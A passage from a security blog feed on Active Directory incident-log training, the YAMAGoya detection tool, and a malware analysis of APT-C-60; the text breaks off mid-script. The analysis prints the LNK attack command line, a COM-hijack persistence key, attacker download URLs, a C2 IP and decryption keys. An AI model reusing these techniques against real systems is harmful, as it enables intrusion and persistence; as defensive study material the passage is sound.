<h3>Introduction</h3>
<p>JPCERT/CC has published training material (hereinafter "this content") on methods for investigating security incidents (hereinafter "incidents") caused by targeted attacks. In real incidents, we increasingly see attackers exploiting vulnerabilities or misconfigurations in internet-facing devices to break into the internal network and ultimately compromise Active Directory administrator privileges. For this reason, this content was created as training material focused on Active Directory.</p>
<p>Log Analysis Training Version 2<br><a href="https://github.com/JPCERTCC/log-analysis-training_v2/">https://github.com/JPCERTCC/log-analysis-training_v2/</a></p>
<p>This content was produced with the cooperation of Mitsui Bussan Secure Directions, Inc.</p>
<h3>Overview of the training content</h3>
<p>Incident response usually proceeds through detection → initial investigation → temporary containment → full investigation → reporting → permanent countermeasures, and this content focuses on the initial investigation. It consists of a basics part and a practical part; the basics part covers the following topics.</p>
<ul>
<li>Typical corporate network configuration</li>
<li>Directory Service</li>
<li>Active Directory</li>
<li>Domain controllers</li>
<li>Domains and forests</li>
<li>Authentication and authorization in AD</li>
<li>Kerberos authentication</li>
<li>NTLM authentication</li>
<li>Remote authentication and local authentication</li>
<li>Group Policy Objects</li>
<li>Attacker network intrusion techniques</li>
<li>Pass-the-Hash</li>
<li>Pass-the-Ticket</li>
<li>NTDS dump</li>
<li>Kerberoast (Kerberoasting attack)</li>
<li>NTLM relay attack</li>
<li>How to read Event Viewer</li>
</ul>
<h3>Details of the training content</h3>
<p>This content covers everything from a basic explanation of domain controllers to authentication and authorization in Active Directory, allowing learners to acquire fundamental knowledge for incident investigation and analysis.</p>
<p><img class="asset asset-image at-xid-4014994 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092857-320wri.png" alt="" width="320" height="180"></p>
<p><img class="asset asset-image at-xid-4014961 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092927-320wri.png" alt="" width="320" height="180"><br>In addition, learners can study the network intrusion techniques attackers use in targeted attacks, and the Windows event log investigation techniques needed to respond to them.</p>
<p><img class="asset asset-image at-xid-4015076 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093223-320wri.png" alt="" width="320" height="180"></p>
<p><img class="asset asset-image at-xid-4015078 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093252-320wri.png" alt="" width="320" height="180"></p>
<p>The practical part builds on the basics part: it is designed as scenario-based training in which learners analyze Windows event logs in Event Viewer and construct a timeline of the attack.</p>
<p><img class="asset asset-image at-xid-4015079 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093642-320wri.png" alt="" width="320" height="180"></p>
<h3>Closing</h3>
<p>This content analyzes Windows event logs with Event Viewer. In real incidents the volume of logs can be enormous, and investigating the relationships between log entries is difficult with Event Viewer alone, so regularly training with analysis methods other than Event Viewer will make real investigations go more smoothly.<br>JPCERT/CC has also released "LogonTracer", a tool that supports the analysis of Windows event logs when such incidents actually occur.</p>
<p><strong>LogonTracer</strong><br><a href="https://github.com/JPCERTCC/LogonTracer">https://github.com/JPCERTCC/LogonTracer</a></p>
<p>We recommend establishing Windows event log investigation procedures that use tools like this during normal operations, and practicing incident investigation, so that you are prepared when a real incident occurs.</p>
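<p>The practical part of the training asks learners to turn raw Security events into an attack timeline, and the closing section notes that Event Viewer alone does not scale. The following is an added example, written for this article rather than taken from the training content or LogonTracer, of doing that step in a script: it tags the events that the listed topics (Kerberoasting, Pass-the-Hash style NTLM logons, admin logons) map onto and correlates two of them. The records are constructed; the event IDs (4624, 4672, 4769) and field names are the standard Windows Security log ones, and the RC4 encryption type value 0x17 is the one Kerberoasting tooling typically requests.</p>

```python
"""Build an attack timeline from Windows Security event log records.

Added example, not part of the JPCERT/CC training content. The records below
are constructed, in the shape of the fields an analyst would read out of Event
Viewer; the event IDs and field names are the standard Security log ones.
"""
from datetime import datetime
from typing import Dict, List, Tuple

TGS_REQUEST = 4769          # Kerberos service ticket requested
LOGON = 4624                # account logged on
SPECIAL_PRIVILEGES = 4672   # special privileges assigned (admin-level logon)
RC4_HMAC = "0x17"           # TicketEncryptionType typically requested by Kerberoasting tools
NETWORK_LOGON = "3"


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def tag_event(ev: Dict) -> str:
    """Label one event with the technique it may indicate ('' if nothing notable)."""
    eid = ev["EventID"]
    if (eid == TGS_REQUEST and ev.get("TicketEncryptionType") == RC4_HMAC
            and not ev.get("ServiceName", "").endswith("$")):
        # RC4 ticket for a user-account SPN: computer accounts (name$) normally use AES.
        return "possible Kerberoasting: RC4 service ticket for a user-account SPN"
    if (eid == LOGON and ev.get("LogonType") == NETWORK_LOGON
            and ev.get("AuthenticationPackageName") == "NTLM"):
        return "NTLM network logon (review for Pass-the-Hash / lateral movement)"
    if eid == SPECIAL_PRIVILEGES:
        return "special privileges assigned"
    return ""


def build_timeline(events: List[Dict]) -> List[Tuple[str, str, str, str]]:
    """Return (time, computer, user, tag) for tagged events, oldest first."""
    rows = []
    for ev in sorted(events, key=lambda e: parse_ts(e["TimeCreated"])):
        tag = tag_event(ev)
        if tag:
            rows.append((ev["TimeCreated"], ev["Computer"], ev["TargetUserName"], tag))
    return rows


def admin_logons_over_ntlm(events: List[Dict], window_s: int = 60) -> List[Tuple[str, str]]:
    """(computer, user) pairs where an NTLM network logon was followed by 4672 within window_s."""
    ntlm = [e for e in events if tag_event(e).startswith("NTLM")]
    privs = [e for e in events if e["EventID"] == SPECIAL_PRIVILEGES]
    pairs = set()
    for n in ntlm:
        for p in privs:
            if p["Computer"] != n["Computer"] or p["TargetUserName"] != n["TargetUserName"]:
                continue
            delta = (parse_ts(p["TimeCreated"]) - parse_ts(n["TimeCreated"])).total_seconds()
            if 0 <= delta <= window_s:
                pairs.add((n["Computer"], n["TargetUserName"]))
    return sorted(pairs)


# Constructed Security log records (not from a real environment).
SAMPLE_EVENTS = [
    {"TimeCreated": "2026-01-21T09:28:57", "Computer": "DC01", "EventID": 4769,
     "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2026-01-21T09:31:00", "Computer": "DC01", "EventID": 4769,
     "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FILESRV$", "TicketEncryptionType": "0x12"},
    {"TimeCreated": "2026-01-21T09:29:10", "Computer": "FILESRV", "EventID": 4624,
     "TargetUserName": "admin", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2026-01-21T09:29:11", "Computer": "FILESRV", "EventID": 4672,
     "TargetUserName": "admin"},
    {"TimeCreated": "2026-01-21T09:30:00", "Computer": "WS01", "EventID": 4624,
     "TargetUserName": "bob", "LogonType": "2", "AuthenticationPackageName": "Kerberos"},
]

if __name__ == "__main__":
    for row in build_timeline(SAMPLE_EVENTS):
        print(" | ".join(row))
    print("admin logon over NTLM:", admin_logons_over_ntlm(SAMPLE_EVENTS))
```

The interactive Kerberos logon and the AES ticket for the computer account are deliberately left untagged: the point of the tagging step is to thin thousands of routine events down to the handful worth placing on the timeline, and the 4624 followed by 4672 correlation is the kind of relationship between entries that is hard to see in Event Viewer.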
  40. YAMAGoya: a real-time client monitoring tool that uses Sigma and YARA rules

    Tue, 18 Nov 2025 02:00:00 -0000

    In recent years, fileless malware and malware obfuscation have made it difficult to detect suspicious activity by scanning files alo...
<p>In recent years, fileless malware and malware obfuscation have made it difficult to detect suspicious activity by scanning individual files alone. To counter such threats, security researchers and malware analysts actively write and publish rules such as Sigma and YARA. However, existing endpoint security tools use their own proprietary detection engines, so there is a shortage of products that can use Sigma and YARA rules directly. To address this, we have released the open source threat hunting tool <strong>YAMAGoya</strong>. YAMAGoya is published in the GitHub repository below; feel free to use it.</p>
<p>GitHub JPCERTCC/YAMAGoya:<a href="https://github.com/JPCERTCC/YAMAGoya" title="YAMAGoya" target="_blank">https://github.com/JPCERTCC/YAMAGoya</a></p>
<p><figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig1-640wri.png" width="640" height="424" alt="YAMAGoya start screen" class="asset asset-image at-xid-3934285 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>Figure 1: YAMAGoya start screen</figcaption></figure></p>
<p>The following sections describe the concept behind YAMAGoya and how to use it.</p>
<h3>The concept of YAMAGoya</h3>
<p>YAMAGoya is designed to detect threats by combining <strong>ETW (Event Tracing for Windows) event monitoring</strong> with <strong>memory scanning</strong>. Its main features are as follows.</p>
<ul>
<li><strong>Runs entirely in user mode</strong>: no kernel driver is required, so it is easy to deploy</li>
<li><strong>Real-time monitoring</strong>: file, process, registry, DNS, network, PowerShell, WMI and other events can be monitored in real time via ETW</li>
<li><strong>Multiple rule formats</strong>: supports Sigma rules and an original YAML rule format that can be used for correlation analysis</li>
<li><strong>Memory scanning</strong>: detects fileless and packed malware with YARA rules</li>
<li><strong>GUI and CLI</strong>: usable not only from the GUI but also from the command line, for example for automation</li>
</ul>
<h3>Installation</h3>
<h4>Obtaining a binary</h4>
<p>If you want to evaluate the tool right away, you can download a binary from the <a href="https://github.com/JPCERTCC/YAMAGoya/releases" title="Releases page of the GitHub repository" target="_blank">Releases page of the GitHub repository</a>.</p>
<h4>Building</h4>
<p>To build from source, see the <a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md" title="YAMAGoya_README" target="_blank">README</a>.</p>
<h3>Usage</h3>
<p>YAMAGoya can be used from both the GUI and the CLI. Running it from the command line without options, or double-clicking it, starts the GUI.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
# Start the GUI
> YAMAGoya.exe
</pre>
<p>The tool must be run with administrator privileges (in order to start an ETW session). When running it, either right-click and select "Run as administrator" or run it from a command prompt started as administrator.</p>
<p>From the command line, it can be used as follows. For the other options, see the <strong>help</strong> option.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
# Monitor with Sigma rules
> YAMAGoya.exe --session --sigma "C:\Rules\Sigma" --all
</pre>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
# Memory scan with YARA rules
> YAMAGoya.exe --session --yara "C:\Rules\YARA" --all
</pre>
<h3>Rules supported by YAMAGoya</h3>
<p>YAMAGoya supports Sigma rules and YARA rules, so publicly available rules can be used as they are. For Sigma rules, the supported categories are limited to those that target the Windows OS. See the <a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md#sigma%25E3%2581%258B%25E3%2582%2589etw%25E3%2581%25B8%25E3%2581%25AE%25E3%2583%259E%25E3%2583%2583%25E3%2583%2594%25E3%2583%25B3%25E3%2582%25B0" title="YAMAGoya_README" target="_blank">README</a> for details.</p>
<p>In addition to Sigma and YARA rules, the tool supports an original YAML rule format. The following describes how to write original YAML rules.</p>
<h4>Writing original YAML rules</h4>
<p>To create an original YAML rule, follow the schema below. Each rule file must contain the following:</p>
<pre style='padding: 10px 10px;color:#1a1a1a;background:#f5f0f0;overflow: auto;white-space: pre'>
- rulename: unique name of the rule
- description: description of what the rule detects
- rules: list of rule items. Each item must contain:
  - ruletype: type of the rule (e.g. regex, binary)
  - target: event category to match
  - rule: pattern or value to match (a valid regular expression for regex rules)
</pre>
<p>The categories listed in Table 1 can be used for <strong>target</strong>.</p>
<table>
<caption>Table 1: List of targets</caption>
<thead> <tr> <td style="background-color: #bdbdbd; width: 100px; text-align: center;">target name</td> <td style="background-color: #bdbdbd; width: 400px; text-align: center;">Description</td> </tr> </thead>
<tbody>
<tr> <td>file</td> <td>File creation event</td> </tr>
<tr> <td>delfile</td> <td>File deletion event</td> </tr>
<tr> <td>process</td> <td>Process event</td> </tr>
<tr> <td>open</td> <td>OpenProcess</td> </tr>
<tr> <td>load</td> <td>DLL load event</td> </tr>
<tr> <td>registry</td> <td>Registry event</td> </tr>
<tr> <td>dns</td> <td>DNS event</td> </tr>
<tr> <td>ipv4</td> <td>IPv4 network event</td> </tr>
<tr> <td>ipv6</td> <td>IPv6 network event</td> </tr>
<tr> <td>shell</td> <td>Shell-related events (Run key, shortcuts)</td> </tr>
<tr> <td>powershell</td> <td>PowerShell execution event</td> </tr>
<tr> <td>wmi</td> <td>WMI command execution event</td> </tr>
</tbody>
</table>
<p>By default, an alert is raised when all of the rule items written in one file are observed within 10 seconds. For example, the following rule detects malware when the listed file creation, process execution, DLL load and network communication are all observed. Original YAML rules are useful when you want to detect by correlating several activities in this way.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
rulename: "ANEL"
description: "Detects ANEL from maldoc type"
rules:
  - ruletype: "regex"
    target: "file"
    rule: "Tmp\\.docx$"
  - ruletype: "regex"
    target: "process"
    rule: "ScnCfg32\\.Exe$"
  - ruletype: "regex"
    target: "dll"
    rule: "vsodscpl\\.dll$"
  - ruletype: "regex"
    target: "file"
    rule: "TCDolW0p\\.log$"
  - ruletype: "ipv4"
    target: "ipv4"
    rule: "45.32.116.146"
</pre>
<h3>Checking logs</h3>
<p>When using the GUI, logs can be viewed on the Alert tab. The text log can also be opened via <strong>Open Log File</strong> on the Alert tab shown in Figure 2.</p>
<p><figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig2-640wri.png" width="640" height="423" alt="YAMAGoya Alert tab" class="asset asset-image at-xid-3934286 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>Figure 2: YAMAGoya Alert tab</figcaption></figure></p>
<p>Alerts are also written to the Windows event log (Application). Table 2 lists the event IDs that YAMAGoya records.</p>
<table>
<caption>Table 2: Event log IDs recorded by YAMAGoya (Application)</caption>
<thead> <tr> <td style="background-color:#bdbdbd; width:100px; text-align:center;">Event ID</td> <td style="background-color:#bdbdbd; text-align:center;">Main trigger condition</td> </tr> </thead>
<tbody>
<tr> <td style="text-align:center;">8001</td> <td>Detection by an original YAML rule</td> </tr>
<tr> <td style="text-align:center;">8002</td> <td>Some items of an original YAML rule matched (debug message)</td> </tr>
<tr> <td style="text-align:center;">8003</td> <td>Process detected by an original YAML rule was terminated (when running in Kill mode)</td> </tr>
<tr> <td style="text-align:center;">8005</td> <td>WinRM outbound communication</td> </tr>
<tr> <td style="text-align:center;">8006</td> <td>WinRM inbound communication</td> </tr>
<tr> <td style="text-align:center;">8008</td> <td>Security Mitigations event</td> </tr>
<tr> <td style="text-align:center;">8009</td> <td>Security Adminless event detected</td> </tr>
<tr> <td style="text-align:center;">8011</td> <td>Security CVE event detected</td> </tr>
<tr> <td style="text-align:center;">8012</td> <td>SMB server authentication detected</td> </tr>
<tr> <td style="text-align:center;">8013</td> <td>SMB server file share detected</td> </tr>
<tr> <td style="text-align:center;">8014</td> <td>SMB server file share addition detected</td> </tr>
<tr> <td style="text-align:center;">8015</td> <td>SMB client connection failure</td> </tr>
<tr> <td style="text-align:center;">8016</td> <td>SMB client file transfer</td> </tr>
<tr> <td style="text-align:center;">8017</td> <td>ETW session started</td> </tr>
<tr> <td style="text-align:center;">8018</td> <td>ETW session stopped</td> </tr>
<tr> <td style="text-align:center;">9001</td> <td>Detection by a Sigma rule</td> </tr>
<tr> <td style="text-align:center;">9002</td> <td>Process detected by a Sigma rule was terminated (when running in Kill mode)</td> </tr>
</tbody>
</table>
<p><figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig3.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig3-640wri.png" width="640" height="302" alt="YAMAGoya alert recorded in the event log" class="asset asset-image at-xid-3934287 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>Figure 3: YAMAGoya alert recorded in the event log</figcaption></figure></p>
<h3>Closing</h3>
<p>Because YAMAGoya can use publicly available signatures such as Sigma and YARA, it lets you apply the security community's know-how to your own defenses. Please make use of it for threat hunting, incident response and similar tasks. Pull requests and feature requests for the tool are welcome.</p>
<h4>FAQ (frequently asked questions)</h4>
<h5>Q1. Can YAMAGoya replace conventional antivirus software?</h5>
<p>A. No. YAMAGoya complements antivirus software rather than replacing it. It ships with no detection rules by default, so you must start by collecting or writing detection rules.</p>
<h5>Q2. Can it run resident (in the background)?</h5>
<p>A. Yes. It resides in the system tray and monitors in the background. Based on the configured rules, it issues notifications and writes logs when something is detected.</p>
<h5>Q3. Can it integrate with an existing SIEM?</h5>
<p>A. Yes. YAMAGoya writes its logs as text and to the event log (Application). If you forward these with a log collection agent or a forwarding feature, they can be ingested into a SIEM such as Splunk.</p>
<h5>Q4. Are there limitations regarding countermeasures against ETW bypass (evasion techniques)?</h5>
<p>A. Yes. At present no dedicated countermeasure against ETW bypass is implemented. A sophisticated attacker could disable or tamper with ETW to evade detection. We recommend combining the tool with EDR or other monitoring tools to build defense in depth.</p>
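<p>The original YAML rule format described above has one non-obvious property: a rule is an AND of its items, but only within a 10-second window. The following is an added example that re-implements those semantics in a stand-alone script so the behaviour can be studied offline; it is not YAMAGoya's own matching engine and makes no claim about its internals. The rule is the article's ANEL example written as a Python dict instead of being loaded with a YAML parser (which is why no PyYAML dependency is needed), the events are constructed, and the alert-reset-after-firing behaviour is my own choice rather than something the article states.</p>

```python
"""Correlate events against a YAMAGoya-style original YAML rule.

Added example, not YAMAGoya code: it implements the rule semantics the article
describes (every item in one rule file must match within 10 seconds). The rule
is the article's ANEL example as a Python dict; the events are constructed.
"""
import re
from typing import Dict, List, Tuple

WINDOW_SECONDS = 10.0  # default correlation window described in the article

RULE = {
    "rulename": "ANEL",
    "description": "Detects ANEL from maldoc type",
    "rules": [
        {"ruletype": "regex", "target": "file", "rule": r"Tmp\.docx$"},
        {"ruletype": "regex", "target": "process", "rule": r"ScnCfg32\.Exe$"},
        {"ruletype": "regex", "target": "dll", "rule": r"vsodscpl\.dll$"},
        {"ruletype": "regex", "target": "file", "rule": r"TCDolW0p\.log$"},
        {"ruletype": "ipv4", "target": "ipv4", "rule": "45.32.116.146"},
    ],
}


def item_matches(item: Dict, target: str, value: str) -> bool:
    """Does one rule item match an event of category `target` carrying `value`?"""
    if item["target"] != target:
        return False
    if item["ruletype"] == "regex":
        return re.search(item["rule"], value) is not None
    if item["ruletype"] == "ipv4":
        return value == item["rule"]
    # The article mentions a "binary" ruletype but shows no example, so it is not modelled here.
    raise ValueError(f"unsupported ruletype {item['ruletype']!r}")


def correlate(rule: Dict, events: List[Tuple[float, str, str]],
              window: float = WINDOW_SECONDS) -> List[float]:
    """Return the timestamps at which every item of `rule` had matched within `window` seconds.

    `events` are (timestamp_seconds, target, value) tuples in time order.
    After an alert the per-item state is cleared so one burst yields one alert
    (assumption for this example, not a documented YAMAGoya behaviour).
    """
    last_seen = [None] * len(rule["rules"])   # newest match time per rule item
    alerts = []
    for ts, target, value in events:
        for idx, item in enumerate(rule["rules"]):
            if item_matches(item, target, value):
                last_seen[idx] = ts
        if all(t is not None and ts - t <= window for t in last_seen):
            alerts.append(ts)
            last_seen = [None] * len(rule["rules"])
    return alerts


def partial_matches(rule: Dict, events: List[Tuple[float, str, str]]) -> List[int]:
    """Indices of rule items that matched at least once (what event 8002 would report)."""
    hit = set()
    for _, target, value in events:
        for idx, item in enumerate(rule["rules"]):
            if item_matches(item, target, value):
                hit.add(idx)
    return sorted(hit)


# Constructed event stream (timestamp in seconds, target, value).
SAMPLE_EVENTS = [
    (100.0, "file", r"C:\Users\user\AppData\Local\Temp\Tmp.docx"),
    (101.5, "process", r"C:\Users\user\AppData\Local\Temp\ScnCfg32.Exe"),
    (102.0, "dll", r"C:\Users\user\AppData\Local\Temp\vsodscpl.dll"),
    (103.0, "file", r"C:\Users\user\AppData\Local\Temp\TCDolW0p.log"),
    (105.0, "ipv4", "45.32.116.146"),            # all five items within 10 s -> alert
    (300.0, "file", r"C:\tmp\Tmp.docx"),
    (320.0, "process", r"C:\tmp\ScnCfg32.Exe"),  # 20 s later: the .docx match has aged out
    (321.0, "dll", r"C:\tmp\vsodscpl.dll"),
    (322.0, "file", r"C:\tmp\TCDolW0p.log"),
    (323.0, "ipv4", "45.32.116.146"),            # only four items inside the window -> no alert
]

if __name__ == "__main__":
    print(f"{RULE['rulename']}: alerts at", correlate(RULE, SAMPLE_EVENTS))
    print("items seen at least once:", partial_matches(RULE, SAMPLE_EVENTS))
```

The second burst shows the trade-off a window introduces: a slow-running infection chain that spreads its stages more than 10 seconds apart will not fire the rule, which is why the 8002 debug event (partial matches) is worth watching when tuning a rule.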
  41. Update on attacks by the attack group APT-C-60

    Mon, 27 Oct 2025 01:30:00 -0000

    In a previous JPCERT/CC Eyes article we covered attacks by the attack group APT-...
<p>In a previous JPCERT/CC Eyes article we introduced <a href="https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html" target="_blank">attacks by the attack group APT-C-60 abusing legitimate services</a>, and JPCERT/CC has continued to observe similar attack activity in Japan. This article covers attacks observed between June and August 2025, focusing on what has changed since the previous article, under the following headings.</p>
<ul>
<li>Attack flow</li>
<li>Updates to the downloaders and SpyGlace</li>
<li>SpyGlace's encoding function and communication method</li>
<li>Decoy documents used</li>
<li>Analysis of the GitHub repositories</li>
</ul>
<h3>Attack flow</h3>
<p>The attack JPCERT/CC observed was, like the attack around August 2024, a targeted email sent to an organization's recruiting staff by an attacker posing as a job applicant. Figure 1 shows the attack flow. Last year's attack had the victim download a VHDX file from Google Drive, whereas in this attack the malicious VHDX file was sent directly as an attachment. When the recipient clicks the LNK file contained in the VHDX file, a malicious script is executed via Git, a legitimate program.</p>
<p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update01-800wri.png" width="800" height="449" alt="" class="asset asset-image at-xid-3922463 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p>
<div style="text-align: center;"> Figure 1: Malware infection flow </div>
<p>The LNK file runs gcmd.exe (a legitimate Git binary) with the command line shown below, which executes the script glog.txt stored in the VHDX file.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
P:\LICENSES.LOG\mingw64\bin\gcmd.exe "cd .\LICENSES.LOG\mingw64\bin && type glog.txt | gcmd.exe" && exit
</pre>
<p>The script executed by Git displays the decoy document and creates and executes files. The created WebClassUser.dat (hereinafter Downloader1) is registered under the registry key below and is persisted and executed through COM hijacking.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
HKCU\Software\Classes\CLSID\{566296fe-e0e8-475f-ba9c-a31ad31620b1}\InProcServer32
</pre>
<h3>Updates to Downloader1 and Downloader2</h3>
<p>So that the attacker can keep track of infected hosts, Downloader1 communicates at regular intervals with statcounter, a legitimate web statistics service. The request header is built in the following format. Compared with the previous version, the difference is that the <strong>volume serial number</strong> and <strong>computer name</strong> are now used to identify the infected host.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
Referer: ONLINE=>[Number1],[Number2] >> [%userprofile%] / [VolumeSerialNumber + ComputerName]
</pre>
<p>Downloader1 also combines a file name derived from the <strong>volume serial number</strong> and <strong>computer name</strong> with a URL embedded in the sample to build a path in the following format, and then contacts it.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
https://raw.githubusercontent.com/carolab989/class2025/refs/heads/main/[VolumeSerialNumber + ComputerName].txt
</pre>
<p>Once the attacker checks the Referer values sent to statcounter and uploads a <strong>"[VolumeSerialNumber + ComputerName].txt"</strong> corresponding to the infected host to GitHub, Downloader1 retrieves that file. Downloader2 is then downloaded and executed based on the URL written in the retrieved file. In addition to specifying a download URL, <strong>"[VolumeSerialNumber + ComputerName].txt"</strong> can also issue the commands in Table 1. For example, <strong>"1*"</strong> changes the interval between GET requests to statcounter.com from the default of 1 hour to 6 hours, which suggests the attacker intends to check the victim environment more cautiously.</p>
<div style="text-align: center;"> Table 1: Downloader commands </div>
<table>
<thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead>
<tbody>
<tr> <td>"1*"</td> <td>Change the interval settings</td> </tr>
<tr> <td>"0*" or "40*"</td> <td>Reset the interval settings</td> </tr>
<tr> <td>"http*"</td> <td>Download DLL</td> </tr>
</tbody>
</table>
<p>As in the previous version, the retrieved file is XOR-decoded with the key <strong>"sgznqhtgnghvmzxponum"</strong> before being executed.</p>
<p>Downloader2 downloads and executes SpyGlace and its loader. Its dynamic API resolution uses an encoding scheme based on ADD and XOR, but the values have changed from the previous version: it now performs <strong>add 0x04</strong> followed by <strong>XOR 0x05</strong>. The SpyGlace loader uses the same encoding scheme. As in the previous version, the file retrieved by Downloader2 is XOR-decoded with the key <strong>"AadDDRTaSPtyAG57er#$ad!lDKTOPLTEL78pE"</strong> and then executed through COM hijacking.</p>
<h3>Updates to SpyGlace</h3>
<p>JPCERT/CC has observed three versions of SpyGlace: <strong>Version 3.1.12, 3.1.13 and 3.1.14</strong>. Compared with Version 3.1.6, observed in 2024, the <strong>prockill</strong> and <strong>proclist</strong> commands have been changed to do nothing, and a new command, <strong>uld</strong>, has been added. The uld command calls a specific function in a loaded module and then unloads the module two seconds later; this is presumably needed for modules that require a specific function to be run before they are unloaded. We also confirmed that the screenupload command now uses the file path and export function name below for what appears to be the screenshot module. We have not obtained the module <strong>Clouds.db</strong> itself, so its exact functionality is unknown, but it is thought to be related to the screenshot command. See Appendix D for the list of implemented commands.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
File path: %LocalAppData%\Microsoft\Windows\Clouds\Clouds.db
Export Function: mssc1
</pre>
<p>There are almost no differences between Versions 3.1.12, 3.1.13 and 3.1.14, but each uses a different Mutex value, and from Version 3.1.14 the autorun path, previously <strong>%public%\AccountPictures\Default\</strong>, has changed to <strong>%appdata%\Microsoft\SystemCertificates\My\CPLs</strong>.</p>
<p>An article<a href="#1">[1]</a> describing a campaign that used Version 3.1.14 was published in September 2025, but since the GitHub repositories and other infrastructure do not overlap, it is considered a separate campaign observed outside Japan.</p>
<h3>Details of SpyGlace's encoding function and communication method</h3>
<p>SpyGlace's characteristic encoding scheme combines a single-byte XOR with a SUB instruction, and it is used extensively for the strings the malware uses and for dynamic API resolution. The <strong>"Download"</strong> command, one of SpyGlace's commands, downloads an encrypted file; we confirmed that it is decrypted with <strong>AES128-CBC</strong> using the KEY and IV below and written to <strong>%temp%\wcts66889.tmp</strong>. Part of the download command's code is shown in Figure 2.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
KEY: B0747C82C23359D1342B47A669796989
IV: 21A44712685A8BA42985783B67883999
</pre>
<p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update02-800wri.png" width="800" height="598" alt="" class="asset asset-image at-xid-3905241 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p>
<div style="text-align: center;"> Figure 2: Part of the download command code </div>
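<p>The Downloader1 stage described above leaves two concrete traces a defender can look for, the statcounter Referer beacon and the per-host task file on raw.githubusercontent.com, and two transformations an analyst has to undo, the repeating-key XOR on retrieved payloads and the add 0x04 / XOR 0x05 API-name encoding. The following is an added example written for this article; it is not APT-C-60's code or JPCERT/CC's. The proxy log lines and payload bytes are constructed (the statcounter path is the one listed in Appendix A, the host identifier is made up), the keys are the ones the article gives, and the assumption that the XOR key repeats cyclically over the whole file is mine, not something the article states.</p>

```python
"""Analyst helpers for the Downloader1 stage described in the article.

Added example, not APT-C-60's code or JPCERT/CC's. It flags proxy log lines
whose Referer follows the statcounter beacon format or whose URL follows the
raw.githubusercontent.com task-file format, XOR-decodes a retrieved payload
with the keys the article lists, and applies the add 0x04 / XOR 0x05 API-name
scheme. Log lines and payload bytes are constructed. Assumption (mine): the
XOR key repeats cyclically over the whole file.
"""
import re
from typing import List, Tuple

DOWNLOADER1_KEY = b"sgznqhtgnghvmzxponum"                   # from the article
DOWNLOADER2_KEY = b"AadDDRTaSPtyAG57er#$ad!lDKTOPLTEL78pE"  # from the article

# Referer: ONLINE=>[Number1],[Number2] >> [%userprofile%] / [VolumeSerialNumber + ComputerName]
BEACON_REFERER_RE = re.compile(r"ONLINE=>\d+,\d+ >> .+? / (?P<hostid>[A-Za-z0-9_-]+)")
# https://raw.githubusercontent.com/<owner>/<repo>/refs/heads/main/[VolumeSerialNumber + ComputerName].txt
# (Appendix A shows both "repo/refs" and "repo//refs", hence the "/+".)
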